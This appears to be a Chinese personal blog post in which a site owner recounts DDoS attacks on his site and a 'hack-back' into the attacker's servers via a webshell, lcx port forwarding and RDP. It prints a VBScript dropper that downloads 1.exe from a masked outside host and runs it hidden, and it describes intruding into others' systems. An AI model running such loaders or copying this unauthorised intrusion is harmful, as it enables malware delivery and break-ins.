【摘要】最近小东的网站（第一资源网）遭到大量ddos攻击，前几天有人给小东反应了这个问题。刚开始，还没注意，觉得就这样吧，反正服务器费用也不贵，可能还赶不上DDOS的费用...emmm~...

    最近小东的网站（第一资源网）遭到大量ddos攻击，前几天有人给小东反应了这个问题。

    刚开始，还没注意，觉得就这样吧，反正服务器费用也不贵，可能还赶不上DDOS的费用...

    emmm~小东大概也知道是谁干的【滑稽】

    那么接下来，咋办呐？

    第一：小东一向讲求和气生财，信誉做事，努力追求双方的信任去赢得更多的信任和价值。小东愿意和各位互联网上的各位大神、小白成为朋友，但只有一个前提，你必须讲诚信。不管这个世界有多少人背信弃义，我，小东坚决坚守自己做人的底线和道德标准，我坚信，人若无信，难立于世。

    第二：从接到热心网友反应，小东才开始逐渐重视起来，为什么呐？其一就是不能助长这种小人心理气焰，其二也是对做黑产的反调查吧。

    第三：目前已经收集到80%的信息，从DDOS的攻击来源，反查到某黑阔地址以及相关信息以及emmm~自己感受。

    顺着就是一顿反围剿（有点艰辛MMP），通过某IP查到某个熟悉类型的网站，然后菜刀，发现3389没开？搞TM的棒棒锤啊？

    然后Lcx端口转发，服务器进行监听51端口，转发到33891端口,渗透进入内网，登陆服务器

    一般的大黑阔就喜欢留下shift后门，然后五次shift，TMD就进来了，也可能这台服务器万人草，不过不像是【误会，嘿嘿~】。

    登陆了某已经沦陷的服务器，查看日志，你以为这么简单就查到了？

    nonono~，人家当然是把日志什么的都清理干净的啦~这样子就查到了，人家大黑阔岂不是要翻船？

    进去以后仔仔细细反了个遍，mdzz，没有马儿跑？【除了我自己的小马在吃草】

    这些ddos的菜逼黑客，一般就是什么自动抓鸡，每天疯狂扫描...(小东早已退出B界，没想到还有大黑客这么风骚)

    于是马上连接到了另外一台在外网的服务器

    

    创建的1的用户名，有毒吧？？？不知道换一个吗，比如去一个gvest也好啊，好歹产生一个干扰啊？

    然后就找到了某些有趣的东西【滑稽】

Set psp = CreateObject("Msxml2.XMLHTTP")
set ws=WScript.CreateObject("WScript.Shell")
psp.Open "GET","http://117.*.*.*:9674/1.exe",0//这些黑客喜欢1.exe?
psp.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(psp.responseBody)
aGet.SaveToFile "c:\1.exe",2
wscript.sleep 8000
ws.Run "c:\1.exe",0

    这个vbs执行后是要下载一个名叫 1.exe的木马程序。然后我们就可以登陆对应HFS的117.*.*.*:9674(这熟悉的端口，我貌似想到了什么木马呐~，脑袋有点发散，哈~)

    嗯，后面的就不多叙述了，就这样吧，其余的到时候看情况交给警方就行了.

    我们去大草原的湖边，听候鸟飞回来，等我们都长大了....就这样吧~

**************************************************************************

    忘了，我咋没说咋修复的呐？oopss~

    对方使用NTP反射放大，也就大致放大700倍的样子，对方的攻击大致有160+的样子，关了ntp服务就好，参考下图：

    妈蛋，图片没保存。。。

    登陆xshell

    按照下面的骚操作：

    小东的网站当然不只是这么简单啦~，每天那个超级无敌大黑阔还在对着某个废弃服务器DDOS~【莫名喜感】

 小东
 简介：专业团队网站开发、安全运维，合作意向请联系！